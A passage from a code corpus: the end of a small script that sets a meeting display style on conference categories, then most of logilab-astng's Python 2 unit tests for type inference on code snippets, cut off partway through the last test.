displayMgr.ConfDisplayMgrRegistery().getDisplayMgr(conf).setDefaultStyle("lhcb_meeting")
logfile.write("\t\t\tconf %s: %s"%(conf.getId(), currentStyle))
dbm = DBMgr.getInstance()
dbm.startRequest()
cat=CategoryManager().getById('233')
currentStyle=cat.getDefaultStyle("meeting")
cat.setDefaultStyle("meeting", "lhcb_meeting")
logfile.write("cat %s: %s"%(cat.getId(), currentStyle))
changeCatStyle(cat)
dbm.endRequest()
| gpl-3.0 | -5,476,135,551,570,129,000 | 37.717391 | 96 | 0.732734 | false |
tkaitchuck/nupic | external/common/lib/python2.6/site-packages/logilab/astng/test/unittest_inference.py | 1 | 41136 | # copyright 2003-2010 Sylvain Thenault, all rights reserved.
# contact mailto:[email protected]
#
# This file is part of logilab-astng.
#
# logilab-astng is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 2.1 of the License, or (at your
# option) any later version.
#
# logilab-astng is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with logilab-astng. If not, see <http://www.gnu.org/licenses/>.
"""tests for the astng inference capabilities
"""
from os.path import join, dirname, abspath
import sys
from StringIO import StringIO
from logilab.common.testlib import TestCase, unittest_main
from logilab.astng import InferenceError, builder, nodes
from logilab.astng.inference import infer_end as inference_infer_end
from logilab.astng.bases import YES, Instance, BoundMethod, UnboundMethod,\
path_wrapper, BUILTINS_NAME
def get_name_node(start_from, name, index=0):
return [n for n in start_from.nodes_of_class(nodes.Name) if n.name == name][index]
def get_node_of_class(start_from, klass):
return start_from.nodes_of_class(klass).next()
builder = builder.ASTNGBuilder()
class InferenceUtilsTC(TestCase):
def test_path_wrapper(self):
def infer_default(self, *args):
raise InferenceError
infer_default = path_wrapper(infer_default)
infer_end = path_wrapper(inference_infer_end)
self.failUnlessRaises(InferenceError,
infer_default(1).next)
self.failUnlessEqual(infer_end(1).next(), 1)
if sys.version_info < (3, 0):
EXC_MODULE = 'exceptions'
else:
EXC_MODULE = BUILTINS_NAME
class InferenceTC(TestCase):
CODE = '''
class C(object):
"new style"
attr = 4
def meth1(self, arg1, optarg=0):
var = object()
print ("yo", arg1, optarg)
self.iattr = "hop"
return var
def meth2(self):
self.meth1(*self.meth3)
def meth3(self, d=attr):
b = self.attr
c = self.iattr
return b, c
ex = Exception("msg")
v = C().meth1(1)
m_unbound = C.meth1
m_bound = C().meth1
a, b, c = ex, 1, "bonjour"
[d, e, f] = [ex, 1.0, ("bonjour", v)]
g, h = f
i, (j, k) = "glup", f
a, b= b, a # Gasp !
'''
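    # The fixture above is parsed once into an astng module; the tests below exercise
    # inference on the names it defines (v, ex, m_bound, a/b/c, ...).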
astng = builder.string_build(CODE, __name__, __file__)
def test_module_inference(self):
infered = self.astng.infer()
obj = infered.next()
self.failUnlessEqual(obj.name, __name__)
self.failUnlessEqual(obj.root().name, __name__)
self.failUnlessRaises(StopIteration, infered.next)
def test_class_inference(self):
infered = self.astng['C'].infer()
obj = infered.next()
self.failUnlessEqual(obj.name, 'C')
self.failUnlessEqual(obj.root().name, __name__)
self.failUnlessRaises(StopIteration, infered.next)
def test_function_inference(self):
infered = self.astng['C']['meth1'].infer()
obj = infered.next()
self.failUnlessEqual(obj.name, 'meth1')
self.failUnlessEqual(obj.root().name, __name__)
self.failUnlessRaises(StopIteration, infered.next)
def test_builtin_name_inference(self):
infered = self.astng['C']['meth1']['var'].infer()
var = infered.next()
self.failUnlessEqual(var.name, 'object')
self.failUnlessEqual(var.root().name, BUILTINS_NAME)
self.failUnlessRaises(StopIteration, infered.next)
def test_tupleassign_name_inference(self):
infered = self.astng['a'].infer()
exc = infered.next()
self.assertIsInstance(exc, Instance)
self.failUnlessEqual(exc.name, 'Exception')
self.failUnlessEqual(exc.root().name, EXC_MODULE)
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng['b'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, 1)
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng['c'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, "bonjour")
self.failUnlessRaises(StopIteration, infered.next)
def test_listassign_name_inference(self):
infered = self.astng['d'].infer()
exc = infered.next()
self.assertIsInstance(exc, Instance)
self.failUnlessEqual(exc.name, 'Exception')
self.failUnlessEqual(exc.root().name, EXC_MODULE)
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng['e'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, 1.0)
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng['f'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Tuple)
self.failUnlessRaises(StopIteration, infered.next)
def test_advanced_tupleassign_name_inference1(self):
infered = self.astng['g'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, "bonjour")
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng['h'].infer()
var = infered.next()
self.failUnlessEqual(var.name, 'object')
self.failUnlessEqual(var.root().name, BUILTINS_NAME)
self.failUnlessRaises(StopIteration, infered.next)
def test_advanced_tupleassign_name_inference2(self):
infered = self.astng['i'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, u"glup")
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng['j'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, "bonjour")
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng['k'].infer()
var = infered.next()
self.failUnlessEqual(var.name, 'object')
self.failUnlessEqual(var.root().name, BUILTINS_NAME)
self.failUnlessRaises(StopIteration, infered.next)
def test_swap_assign_inference(self):
infered = self.astng.locals['a'][1].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, 1)
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng.locals['b'][1].infer()
exc = infered.next()
self.assertIsInstance(exc, Instance)
self.failUnlessEqual(exc.name, 'Exception')
self.failUnlessEqual(exc.root().name, EXC_MODULE)
self.failUnlessRaises(StopIteration, infered.next)
def test_getattr_inference1(self):
infered = self.astng['ex'].infer()
exc = infered.next()
self.assertIsInstance(exc, Instance)
self.failUnlessEqual(exc.name, 'Exception')
self.failUnlessEqual(exc.root().name, EXC_MODULE)
self.failUnlessRaises(StopIteration, infered.next)
def test_getattr_inference2(self):
infered = get_node_of_class(self.astng['C']['meth2'], nodes.Getattr).infer()
meth1 = infered.next()
self.failUnlessEqual(meth1.name, 'meth1')
self.failUnlessEqual(meth1.root().name, __name__)
self.failUnlessRaises(StopIteration, infered.next)
def test_getattr_inference3(self):
infered = self.astng['C']['meth3']['b'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, 4)
self.failUnlessRaises(StopIteration, infered.next)
def test_getattr_inference4(self):
infered = self.astng['C']['meth3']['c'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, "hop")
self.failUnlessRaises(StopIteration, infered.next)
def test_callfunc_inference(self):
infered = self.astng['v'].infer()
meth1 = infered.next()
self.assertIsInstance(meth1, Instance)
self.failUnlessEqual(meth1.name, 'object')
self.failUnlessEqual(meth1.root().name, BUILTINS_NAME)
self.failUnlessRaises(StopIteration, infered.next)
def test_unbound_method_inference(self):
infered = self.astng['m_unbound'].infer()
meth1 = infered.next()
self.assertIsInstance(meth1, UnboundMethod)
self.failUnlessEqual(meth1.name, 'meth1')
self.failUnlessEqual(meth1.parent.frame().name, 'C')
self.failUnlessRaises(StopIteration, infered.next)
def test_bound_method_inference(self):
infered = self.astng['m_bound'].infer()
meth1 = infered.next()
self.assertIsInstance(meth1, BoundMethod)
self.failUnlessEqual(meth1.name, 'meth1')
self.failUnlessEqual(meth1.parent.frame().name, 'C')
self.failUnlessRaises(StopIteration, infered.next)
def test_args_default_inference1(self):
optarg = get_name_node(self.astng['C']['meth1'], 'optarg')
infered = optarg.infer()
obj1 = infered.next()
self.assertIsInstance(obj1, nodes.Const)
self.failUnlessEqual(obj1.value, 0)
obj1 = infered.next()
self.assertIs(obj1, YES, obj1)
self.failUnlessRaises(StopIteration, infered.next)
def test_args_default_inference2(self):
infered = self.astng['C']['meth3'].ilookup('d')
obj1 = infered.next()
self.assertIsInstance(obj1, nodes.Const)
self.failUnlessEqual(obj1.value, 4)
obj1 = infered.next()
self.assertIs(obj1, YES, obj1)
self.failUnlessRaises(StopIteration, infered.next)
def test_inference_restrictions(self):
infered = get_name_node(self.astng['C']['meth1'], 'arg1').infer()
obj1 = infered.next()
self.assertIs(obj1, YES, obj1)
self.failUnlessRaises(StopIteration, infered.next)
def test_ancestors_inference(self):
code = '''
class A:
pass
class A(A):
pass
'''
astng = builder.string_build(code, __name__, __file__)
a1 = astng.locals['A'][0]
a2 = astng.locals['A'][1]
a2_ancestors = list(a2.ancestors())
self.failUnlessEqual(len(a2_ancestors), 1)
self.failUnless(a2_ancestors[0] is a1)
def test_ancestors_inference2(self):
code = '''
class A:
pass
class B(A): pass
class A(B):
pass
'''
astng = builder.string_build(code, __name__, __file__)
a1 = astng.locals['A'][0]
a2 = astng.locals['A'][1]
a2_ancestors = list(a2.ancestors())
self.failUnlessEqual(len(a2_ancestors), 2)
self.failUnless(a2_ancestors[0] is astng.locals['B'][0])
self.failUnless(a2_ancestors[1] is a1, a2_ancestors[1])
def test_f_arg_f(self):
code = '''
def f(f=1):
return f
a = f()
'''
astng = builder.string_build(code, __name__, __file__)
a = astng['a']
a_infered = a.infered()
self.failUnlessEqual(a_infered[0].value, 1)
self.assertEqual(len(a_infered), 1)
def test_exc_ancestors(self):
code = '''
def f():
raise NotImplementedError
'''
astng = builder.string_build(code, __name__, __file__)
error = astng.nodes_of_class(nodes.Name).next()
nie = error.infered()[0]
self.assertIsInstance(nie, nodes.Class)
nie_ancestors = [c.name for c in nie.ancestors()]
if sys.version_info < (3, 0):
self.failUnlessEqual(nie_ancestors, ['RuntimeError', 'StandardError', 'Exception', 'BaseException', 'object'])
else:
self.failUnlessEqual(nie_ancestors, ['RuntimeError', 'Exception', 'BaseException', 'object'])
def test_except_inference(self):
code = '''
try:
print (hop)
except NameError, ex:
ex1 = ex
except Exception, ex:
ex2 = ex
raise
'''
if sys.version_info >= (3, 0):
code = code.replace(', ex:', ' as ex:')
astng = builder.string_build(code, __name__, __file__)
ex1 = astng['ex1']
ex1_infer = ex1.infer()
ex1 = ex1_infer.next()
self.assertIsInstance(ex1, Instance)
self.failUnlessEqual(ex1.name, 'NameError')
self.failUnlessRaises(StopIteration, ex1_infer.next)
ex2 = astng['ex2']
ex2_infer = ex2.infer()
ex2 = ex2_infer.next()
self.assertIsInstance(ex2, Instance)
self.failUnlessEqual(ex2.name, 'Exception')
self.failUnlessRaises(StopIteration, ex2_infer.next)
def test_del1(self):
code = '''
del undefined_attr
'''
delete = builder.string_build(code, __name__, __file__).body[0]
self.failUnlessRaises(InferenceError, delete.infer)
def test_del2(self):
code = '''
a = 1
b = a
del a
c = a
a = 2
d = a
'''
astng = builder.string_build(code, __name__, __file__)
n = astng['b']
n_infer = n.infer()
infered = n_infer.next()
self.assertIsInstance(infered, nodes.Const)
self.failUnlessEqual(infered.value, 1)
self.failUnlessRaises(StopIteration, n_infer.next)
n = astng['c']
n_infer = n.infer()
self.failUnlessRaises(InferenceError, n_infer.next)
n = astng['d']
n_infer = n.infer()
infered = n_infer.next()
self.assertIsInstance(infered, nodes.Const)
self.failUnlessEqual(infered.value, 2)
self.failUnlessRaises(StopIteration, n_infer.next)
def test_builtin_types(self):
code = '''
l = [1]
t = (2,)
d = {}
s = ''
s2 = '_'
'''
astng = builder.string_build(code, __name__, __file__)
n = astng['l']
infered = n.infer().next()
self.assertIsInstance(infered, nodes.List)
self.assertIsInstance(infered, Instance)
self.failUnlessEqual(infered.getitem(0).value, 1)
self.assertIsInstance(infered._proxied, nodes.Class)
self.failUnlessEqual(infered._proxied.name, 'list')
self.failUnless('append' in infered._proxied.locals)
n = astng['t']
infered = n.infer().next()
self.assertIsInstance(infered, nodes.Tuple)
self.assertIsInstance(infered, Instance)
self.failUnlessEqual(infered.getitem(0).value, 2)
self.assertIsInstance(infered._proxied, nodes.Class)
self.failUnlessEqual(infered._proxied.name, 'tuple')
n = astng['d']
infered = n.infer().next()
self.assertIsInstance(infered, nodes.Dict)
self.assertIsInstance(infered, Instance)
self.assertIsInstance(infered._proxied, nodes.Class)
self.failUnlessEqual(infered._proxied.name, 'dict')
self.failUnless('get' in infered._proxied.locals)
n = astng['s']
infered = n.infer().next()
self.assertIsInstance(infered, nodes.Const)
self.assertIsInstance(infered, Instance)
self.failUnlessEqual(infered.name, 'str')
self.failUnless('lower' in infered._proxied.locals)
n = astng['s2']
infered = n.infer().next()
self.failUnlessEqual(infered.getitem(0).value, '_')
def test_unicode_type(self):
if sys.version_info >= (3, 0):
self.skipTest('unicode removed on py >= 3.0')
code = '''u = u""'''
astng = builder.string_build(code, __name__, __file__)
n = astng['u']
infered = n.infer().next()
self.assertIsInstance(infered, nodes.Const)
self.assertIsInstance(infered, Instance)
self.failUnlessEqual(infered.name, 'unicode')
self.failUnless('lower' in infered._proxied.locals)
def test_descriptor_are_callable(self):
code = '''
class A:
statm = staticmethod(open)
clsm = classmethod('whatever')
'''
astng = builder.string_build(code, __name__, __file__)
statm = astng['A'].igetattr('statm').next()
self.failUnless(statm.callable())
clsm = astng['A'].igetattr('clsm').next()
self.failUnless(clsm.callable())
def test_bt_ancestor_crash(self):
code = '''
class Warning(Warning):
pass
'''
astng = builder.string_build(code, __name__, __file__)
w = astng['Warning']
ancestors = w.ancestors()
ancestor = ancestors.next()
self.failUnlessEqual(ancestor.name, 'Warning')
self.failUnlessEqual(ancestor.root().name, EXC_MODULE)
ancestor = ancestors.next()
self.failUnlessEqual(ancestor.name, 'Exception')
self.failUnlessEqual(ancestor.root().name, EXC_MODULE)
ancestor = ancestors.next()
self.failUnlessEqual(ancestor.name, 'BaseException')
self.failUnlessEqual(ancestor.root().name, EXC_MODULE)
ancestor = ancestors.next()
self.failUnlessEqual(ancestor.name, 'object')
self.failUnlessEqual(ancestor.root().name, BUILTINS_NAME)
self.failUnlessRaises(StopIteration, ancestors.next)
def test_qqch(self):
code = '''
from logilab.common.modutils import load_module_from_name
xxx = load_module_from_name('__pkginfo__')
'''
astng = builder.string_build(code, __name__, __file__)
xxx = astng['xxx']
self.assertSetEqual(set(n.__class__ for n in xxx.infered()),
set([nodes.Const, YES.__class__]))
def test_method_argument(self):
code = '''
class ErudiEntitySchema:
"""a entity has a type, a set of subject and or object relations"""
def __init__(self, e_type, **kwargs):
kwargs['e_type'] = e_type.capitalize().encode()
def meth(self, e_type, *args, **kwargs):
kwargs['e_type'] = e_type.capitalize().encode()
print(args)
'''
astng = builder.string_build(code, __name__, __file__)
arg = get_name_node(astng['ErudiEntitySchema']['__init__'], 'e_type')
self.failUnlessEqual([n.__class__ for n in arg.infer()],
[YES.__class__])
arg = get_name_node(astng['ErudiEntitySchema']['__init__'], 'kwargs')
self.failUnlessEqual([n.__class__ for n in arg.infer()],
[nodes.Dict])
arg = get_name_node(astng['ErudiEntitySchema']['meth'], 'e_type')
self.failUnlessEqual([n.__class__ for n in arg.infer()],
[YES.__class__])
arg = get_name_node(astng['ErudiEntitySchema']['meth'], 'args')
self.failUnlessEqual([n.__class__ for n in arg.infer()],
[nodes.Tuple])
arg = get_name_node(astng['ErudiEntitySchema']['meth'], 'kwargs')
self.failUnlessEqual([n.__class__ for n in arg.infer()],
[nodes.Dict])
def test_tuple_then_list(self):
code = '''
def test_view(rql, vid, tags=()):
tags = list(tags)
tags.append(vid)
'''
astng = builder.string_build(code, __name__, __file__)
name = get_name_node(astng['test_view'], 'tags', -1)
it = name.infer()
tags = it.next()
self.failUnlessEqual(tags.__class__, Instance)
self.failUnlessEqual(tags._proxied.name, 'list')
self.failUnlessRaises(StopIteration, it.next)
def test_mulassign_inference(self):
code = '''
def first_word(line):
"""Return the first word of a line"""
return line.split()[0]
def last_word(line):
"""Return last word of a line"""
return line.split()[-1]
def process_line(word_pos):
"""Silly function: returns (ok, callable) based on argument.
For test purpose only.
"""
if word_pos > 0:
return (True, first_word)
elif word_pos < 0:
return (True, last_word)
else:
return (False, None)
if __name__ == '__main__':
line_number = 0
for a_line in file('test_callable.py'):
tupletest = process_line(line_number)
(ok, fct) = process_line(line_number)
if ok:
fct(a_line)
'''
astng = builder.string_build(code, __name__, __file__)
self.failUnlessEqual(len(list(astng['process_line'].infer_call_result(
None))), 3)
self.failUnlessEqual(len(list(astng['tupletest'].infer())), 3)
values = ['Function(first_word)', 'Function(last_word)', 'Const(NoneType)']
self.failUnlessEqual([str(infered)
for infered in astng['fct'].infer()], values)
def test_float_complex_ambiguity(self):
code = '''
def no_conjugate_member(magic_flag):
"""should not raise E1101 on something.conjugate"""
if magic_flag:
something = 1.0
else:
something = 1.0j
if isinstance(something, float):
return something
return something.conjugate()
'''
astng = builder.string_build(code, __name__, __file__)
self.failUnlessEqual([i.value for i in
astng['no_conjugate_member'].ilookup('something')], [1.0, 1.0j])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'something', -1).infer()], [1.0, 1.0j])
def test_lookup_cond_branches(self):
code = '''
def no_conjugate_member(magic_flag):
"""should not raise E1101 on something.conjugate"""
something = 1.0
if magic_flag:
something = 1.0j
return something.conjugate()
'''
astng = builder.string_build(code, __name__, __file__)
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'something', -1).infer()], [1.0, 1.0j])
def test_simple_subscript(self):
code = '''
a = [1, 2, 3][0]
b = (1, 2, 3)[1]
c = (1, 2, 3)[-1]
d = a + b + c
print (d)
'''
astng = builder.string_build(code, __name__, __file__)
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'a', -1).infer()], [1])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'b', -1).infer()], [2])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'c', -1).infer()], [3])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'd', -1).infer()], [6])
#def test_simple_tuple(self):
#"""test case for a simple tuple value"""
## XXX tuple inference is not implemented ...
#code = """
#a = (1,)
#b = (22,)
#some = a + b
#"""
#astng = builder.string_build(code, __name__, __file__)
#self.failUnlessEqual(astng['some'].infer.next().as_string(), "(1, 22)")
def test_simple_for(self):
code = '''
for a in [1, 2, 3]:
print (a)
for b,c in [(1,2), (3,4)]:
print (b)
print (c)
print ([(d,e) for e,d in ([1,2], [3,4])])
'''
astng = builder.string_build(code, __name__, __file__)
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'a', -1).infer()], [1, 2, 3])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'b', -1).infer()], [1, 3])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'c', -1).infer()], [2, 4])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'd', -1).infer()], [2, 4])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'e', -1).infer()], [1, 3])
def test_simple_for_genexpr(self):
code = '''
print ((d,e) for e,d in ([1,2], [3,4]))
'''
astng = builder.string_build(code, __name__, __file__)
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'd', -1).infer()], [2, 4])
self.failUnlessEqual([i.value for i in
get_name_node(astng, 'e', -1).infer()], [1, 3])
def test_builtin_help(self):
code = '''
help()
'''
# XXX failing since __builtin__.help assignment has
# been moved into a function...
astng = builder.string_build(code, __name__, __file__)
node = get_name_node(astng, 'help', -1)
infered = list(node.infer())
self.failUnlessEqual(len(infered), 1, infered)
self.assertIsInstance(infered[0], Instance)
self.failUnlessEqual(str(infered[0]),
'Instance of site._Helper')
def test_builtin_open(self):
code = '''
open("toto.txt")
'''
astng = builder.string_build(code, __name__, __file__)
node = get_name_node(astng, 'open', -1)
infered = list(node.infer())
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Function)
self.failUnlessEqual(infered[0].name, 'open')
def test_callfunc_context_func(self):
code = '''
def mirror(arg=None):
return arg
un = mirror(1)
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(astng.igetattr('un'))
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Const)
self.failUnlessEqual(infered[0].value, 1)
def test_callfunc_context_lambda(self):
code = '''
mirror = lambda x=None: x
un = mirror(1)
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(astng.igetattr('mirror'))
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Lambda)
infered = list(astng.igetattr('un'))
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Const)
self.failUnlessEqual(infered[0].value, 1)
def test_factory_method(self):
code = '''
class Super(object):
@classmethod
def instance(cls):
return cls()
class Sub(Super):
def method(self):
print ('method called')
sub = Sub.instance()
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(astng.igetattr('sub'))
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], Instance)
self.failUnlessEqual(infered[0]._proxied.name, 'Sub')
def test_import_as(self):
code = '''
import os.path as osp
print (osp.dirname(__file__))
from os.path import exists as e
assert e(__file__)
from new import code as make_code
print (make_code)
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(astng.igetattr('osp'))
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Module)
self.failUnlessEqual(infered[0].name, 'os.path')
infered = list(astng.igetattr('e'))
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Function)
self.failUnlessEqual(infered[0].name, 'exists')
if sys.version_info >= (3, 0):
self.skipTest('<new> module has been removed')
infered = list(astng.igetattr('make_code'))
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], Instance)
self.failUnlessEqual(str(infered[0]),
'Instance of %s.type' % BUILTINS_NAME)
def _test_const_infered(self, node, value):
infered = list(node.infer())
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Const)
self.failUnlessEqual(infered[0].value, value)
def test_unary_not(self):
for code in ('a = not (1,); b = not ()',
'a = not {1:2}; b = not {}'):
astng = builder.string_build(code, __name__, __file__)
self._test_const_infered(astng['a'], False)
self._test_const_infered(astng['b'], True)
def test_binary_op_int_add(self):
astng = builder.string_build('a = 1 + 2', __name__, __file__)
self._test_const_infered(astng['a'], 3)
def test_binary_op_int_sub(self):
astng = builder.string_build('a = 1 - 2', __name__, __file__)
self._test_const_infered(astng['a'], -1)
def test_binary_op_float_div(self):
astng = builder.string_build('a = 1 / 2.', __name__, __file__)
self._test_const_infered(astng['a'], 1 / 2.)
def test_binary_op_str_mul(self):
astng = builder.string_build('a = "*" * 40', __name__, __file__)
self._test_const_infered(astng['a'], "*" * 40)
def test_binary_op_bitand(self):
astng = builder.string_build('a = 23&20', __name__, __file__)
self._test_const_infered(astng['a'], 23&20)
def test_binary_op_bitor(self):
astng = builder.string_build('a = 23|8', __name__, __file__)
self._test_const_infered(astng['a'], 23|8)
def test_binary_op_bitxor(self):
astng = builder.string_build('a = 23^9', __name__, __file__)
self._test_const_infered(astng['a'], 23^9)
def test_binary_op_shiftright(self):
astng = builder.string_build('a = 23 >>1', __name__, __file__)
self._test_const_infered(astng['a'], 23>>1)
def test_binary_op_shiftleft(self):
astng = builder.string_build('a = 23 <<1', __name__, __file__)
self._test_const_infered(astng['a'], 23<<1)
def test_binary_op_list_mul(self):
for code in ('a = [[]] * 2', 'a = 2 * [[]]'):
astng = builder.string_build(code, __name__, __file__)
infered = list(astng['a'].infer())
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.List)
self.failUnlessEqual(len(infered[0].elts), 2)
self.assertIsInstance(infered[0].elts[0], nodes.List)
self.assertIsInstance(infered[0].elts[1], nodes.List)
def test_binary_op_list_mul_none(self):
'test correct handling on list multiplied by None'
astng = builder.string_build( 'a = [1] * None\nb = [1] * "r"')
infered = astng['a'].infered()
self.assertEqual(len(infered), 1)
self.assertEqual(infered[0], YES)
infered = astng['b'].infered()
self.assertEqual(len(infered), 1)
self.assertEqual(infered[0], YES)
def test_binary_op_tuple_add(self):
astng = builder.string_build('a = (1,) + (2,)', __name__, __file__)
infered = list(astng['a'].infer())
self.failUnlessEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Tuple)
self.failUnlessEqual(len(infered[0].elts), 2)
self.failUnlessEqual(infered[0].elts[0].value, 1)
self.failUnlessEqual(infered[0].elts[1].value, 2)
def test_binary_op_custom_class(self):
code = '''
class myarray:
def __init__(self, array):
self.array = array
def __mul__(self, x):
return myarray([2,4,6])
def astype(self):
return "ASTYPE"
def randint(maximum):
if maximum is not None:
return myarray([1,2,3]) * 2
else:
return int(5)
x = randint(1)
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(astng.igetattr('x'))
self.failUnlessEqual(len(infered), 2)
value = [str(v) for v in infered]
# The __name__ trick here makes it work when invoked directly
# (__name__ == '__main__') and through pytest (__name__ ==
# 'unittest_inference')
self.assertEqual(value, ['Instance of %s.myarray' % __name__,
'Instance of %s.int' % BUILTINS_NAME])
def test_nonregr_lambda_arg(self):
code = '''
def f(g = lambda: None):
g().x
'''
astng = builder.string_build(code, __name__, __file__)
callfuncnode = astng['f'].body[0].value.expr
infered = list(callfuncnode.infer())
self.failUnlessEqual(len(infered), 2, infered)
infered.remove(YES)
self.assertIsInstance(infered[0], nodes.Const)
self.failUnlessEqual(infered[0].value, None)
def test_nonregr_getitem_empty_tuple(self):
code = '''
def f(x):
a = ()[x]
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(astng['f'].ilookup('a'))
self.failUnlessEqual(len(infered), 1)
self.failUnlessEqual(infered[0], YES)
def test_python25_generator_exit(self):
sys.stderr = StringIO()
data = "b = {}[str(0)+''].a"
astng = builder.string_build(data, __name__, __file__)
list(astng['b'].infer())
output = sys.stderr.getvalue()
# I have no idea how to test for this in another way...
self.failIf("RuntimeError" in output, "Exception exceptions.RuntimeError: 'generator ignored GeneratorExit' in <generator object> ignored")
sys.stderr = sys.__stderr__
def test_python25_relative_import(self):
data = "from ...common import date; print (date)"
# !! FIXME also this relative import would not work 'in real' (no __init__.py in test/)
# the test works since we pretend we have a package by passing the full modname
astng = builder.string_build(data, 'logilab.astng.test.unittest_inference', __file__)
infered = get_name_node(astng, 'date').infer().next()
self.assertIsInstance(infered, nodes.Module)
self.assertEqual(infered.name, 'logilab.common.date')
def test_python25_no_relative_import(self):
fname = join(abspath(dirname(__file__)), 'regrtest_data', 'package', 'absimport.py')
astng = builder.file_build(fname, 'absimport')
self.failUnless(astng.absolute_import_activated(), True)
infered = get_name_node(astng, 'import_package_subpackage_module').infer().next()
# failed to import since absolute_import is activated
self.failUnless(infered is YES)
def test_nonregr_absolute_import(self):
fname = join(abspath(dirname(__file__)), 'regrtest_data', 'absimp', 'string.py')
astng = builder.file_build(fname, 'absimp.string')
self.failUnless(astng.absolute_import_activated(), True)
infered = get_name_node(astng, 'string').infer().next()
self.assertIsInstance(infered, nodes.Module)
self.assertEqual(infered.name, 'string')
self.failUnless('lower' in infered.locals)
def test_mechanize_open(self):
try:
import mechanize
except ImportError:
self.skipTest('require mechanize installed')
data = '''from mechanize import Browser
print (Browser)
b = Browser()
'''
astng = builder.string_build(data, __name__, __file__)
browser = get_name_node(astng, 'Browser').infer().next()
self.assertIsInstance(browser, nodes.Class)
bopen = list(browser.igetattr('open'))
self.skipTest('the commit said: "huum, see that later"')
self.assertEqual(len(bopen), 1)
self.assertIsInstance(bopen[0], nodes.Function)
self.failUnless(bopen[0].callable())
b = get_name_node(astng, 'b').infer().next()
self.assertIsInstance(b, Instance)
bopen = list(b.igetattr('open'))
self.assertEqual(len(bopen), 1)
self.assertIsInstance(bopen[0], BoundMethod)
self.failUnless(bopen[0].callable())
def test_property(self):
code = '''
from smtplib import SMTP
class SendMailController(object):
@property
def smtp(self):
return SMTP(mailhost, port)
@property
def me(self):
return self
my_smtp = SendMailController().smtp
my_me = SendMailController().me
'''
decorators = set(['%s.property' % BUILTINS_NAME])
astng = builder.string_build(code, __name__, __file__)
self.assertEqual(astng['SendMailController']['smtp'].decoratornames(),
decorators)
propinfered = list(astng.body[2].value.infer())
self.assertEqual(len(propinfered), 1)
propinfered = propinfered[0]
self.assertIsInstance(propinfered, Instance)
self.assertEqual(propinfered.name, 'SMTP')
self.assertEqual(propinfered.root().name, 'smtplib')
self.assertEqual(astng['SendMailController']['me'].decoratornames(),
decorators)
propinfered = list(astng.body[3].value.infer())
self.assertEqual(len(propinfered), 1)
propinfered = propinfered[0]
self.assertIsInstance(propinfered, Instance)
self.assertEqual(propinfered.name, 'SendMailController')
self.assertEqual(propinfered.root().name, __name__)
def test_im_func_unwrap(self):
code = '''
class EnvBasedTC:
def pactions(self):
pass
pactions = EnvBasedTC.pactions.im_func
print (pactions)
class EnvBasedTC2:
pactions = EnvBasedTC.pactions.im_func
print (pactions)
'''
astng = builder.string_build(code, __name__, __file__)
pactions = get_name_node(astng, 'pactions')
infered = list(pactions.infer())
self.assertEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Function)
pactions = get_name_node(astng['EnvBasedTC2'], 'pactions')
infered = list(pactions.infer())
self.assertEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Function)
def test_augassign(self):
code = '''
a = 1
a += 2
print (a)
'''
astng = builder.string_build(code, __name__, __file__)
